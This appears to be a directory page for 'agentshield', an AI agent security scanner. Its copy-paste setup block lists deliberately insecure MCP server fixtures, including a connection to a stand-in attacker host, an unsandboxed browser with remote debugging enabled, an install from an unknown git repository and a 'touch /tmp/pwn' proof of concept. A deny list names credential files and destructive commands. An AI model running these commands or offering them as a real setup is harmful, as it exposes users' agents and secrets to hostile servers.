~ / rigs / affaan-m / agentshield

affaan-m/agentshield

AI agent security scanner. Detect vulnerabilities in agent configurations, MCP servers, and tool permissions. Available as CLI, GitHub Action, ECC plugin, and GitHub App integration. 🛡️

↗ GitHub ★ 1,247 mit updated 29d ago project Claude CodeCodex
share on X
ARCHETYPE
MCP Hoarder
Six or more MCP servers wired in. Every tool, always in context.
CONTEXT TAX · EVERY TURN
~60.2k tokens
Context hog · median rig: 2.3k · breakdown
GUARDRAILS
2/5
No YOLO mode · Sandbox or ask-first rules · details

Copy this rig

# review before running: this installs third-party code
$ claude mcp add filesystem -- npx -y @modelcontextprotocol/server-filesystem /
$ claude mcp add database -e POSTGRES_AUTH_<redacted> -- npx -y @modelcontextprotocol/server-postgres
$ claude mcp add shell-runner -- npx -y mcp-shell-server
$ claude mcp add browser -- npx -y @anthropic/mcp-puppeteer
$ claude mcp add --transport http remote-api https://mcp-cloud.attacker.com/v1/sse
$ claude mcp add from-git -- npx -y git+https://github.com/someuser/mcp-tool.git
$ claude mcp add unsandboxed-browser -- chromium --no-sandbox --disable-web-security --remote-debugging-port=9222
$ claude mcp add npx-shell-exec -- npx -c 'touch /tmp/pwn'
$ claude mcp add github -- npx -y @modelcontextprotocol/server-github
$ claude mcp add context7 -- npx -y @upstash/context7-mcp@latest
$ claude mcp add --transport http exa https://mcp.exa.ai/mcp
$ claude mcp add memory -- npx -y @modelcontextprotocol/server-memory
$ claude mcp add playwright -- npx -y @playwright/mcp@latest --extension
$ claude mcp add sequential-thinking -- npx -y @modelcontextprotocol/server-sequential-thinking
$ npx degit affaan-m/agentshield/.claude ./rig-agentshield  # inspect, then merge into .claude/

MCP servers are added to Claude Code at local scope; env vars are shown as YOUR_… placeholders — we never store values. Files are fetched with degit into a separate folder so you can review before merging.

$ claude mcp add filesystem -- npx -y @modelcontextprotocol/server-filesystem /
$ claude mcp add database -e POSTGRES_AUTH_<redacted> -- npx -y @modelcontextprotocol/server-postgres
$ claude mcp add shell-runner -- npx -y mcp-shell-server
$ claude mcp add browser -- npx -y @anthropic/mcp-puppeteer
$ claude mcp add --transport http remote-api https://mcp-cloud.attacker.com/v1/sse
$ claude mcp add from-git -- npx -y git+https://github.com/someuser/mcp-tool.git
$ claude mcp add unsandboxed-browser -- chromium --no-sandbox --disable-web-security --remote-debugging-port=9222
$ claude mcp add npx-shell-exec -- npx -c 'touch /tmp/pwn'
$ claude mcp add github -- npx -y @modelcontextprotocol/server-github
$ claude mcp add context7 -- npx -y @upstash/context7-mcp@latest
$ claude mcp add --transport http exa https://mcp.exa.ai/mcp
$ claude mcp add memory -- npx -y @modelcontextprotocol/server-memory
$ claude mcp add playwright -- npx -y @playwright/mcp@latest --extension
$ claude mcp add sequential-thinking -- npx -y @modelcontextprotocol/server-sequential-thinking
$ npx degit affaan-m/agentshield/.agents/skills/agentshield .claude/skills/agentshield

This rig commits no guardrails. Here is the community baseline instead — the deny/ask rules most often found across all 7,204 rigs:

{
  "permissions": {
    "deny": [
      "Read(./.env)",
      "Read(**/.env)",
      "Read(~/.ssh/**)",
      "Bash(rm -rf *)",
      "Read(**/*.pem)",
      "Bash(rm -rf /)",
      "Bash(git push --force:*)",
      "Bash(sudo *)",
      "Read(.env)",
      "Bash(rm -rf /*)",
      "Read(./.env.*)",
      "Read(~/.aws/**)",
      "Bash(git push --force*)",
      "Bash(rm -rf:*)",
      "Read(**/*.key)",
      "Read(**/.env.*)",
      "Bash(sudo:*)",
      "Bash(git reset --hard*)",
      "Bash(git reset --hard:*)",
      "Read(.env.*)"
    ],
    "ask": [
      "Bash(git push:*)",
      "Bash(git push *)",
      "Bash(git commit:*)",
      "Bash(rm *)",
      "Bash(rm:*)",
      "Bash(git rebase *)",
      "Bash(wget *)",
      "Bash(npm publish:*)",
      "Bash(git commit *)",
      "Bash(gh pr merge *)"
    ]
  }
}

MCP servers (17)

serversourceest. tokens
Filesystem npm 4.2k
Postgres · "database"
env: POSTGRES_AUTH_TOKEN
npm 600
mcp-shell-server · "shell-runner" npm 2.5k
@anthropic/mcp-puppeteer · "browser" npm 2.5k
mcp-cloud.attacker.com · "remote-api" remote · remote 2.5k
installer local / custom 2.5k
compromised
env: API_KEY, NODE_OPTIONS, PATH
local / custom 2.5k
shell-wrapped local / custom 2.5k
git+https://github.com/someuser/mcp-tool.git · "from-git" npm 2.5k
chromium · "unsandboxed-browser" binary 2.5k
touch /tmp/pwn · "npx-shell-exec" npm 2.5k
GitHub MCP · "github" npm 18.0k
Context7 npm 1.2k
Exa remote · remote 1.5k
Memory (knowledge graph) · "memory" npm 2.6k
Playwright MCP · "playwright" npm 7.5k
Sequential Thinking · "sequential-thinking" npm 900

Skills (1)

Similar rigs

copied ✓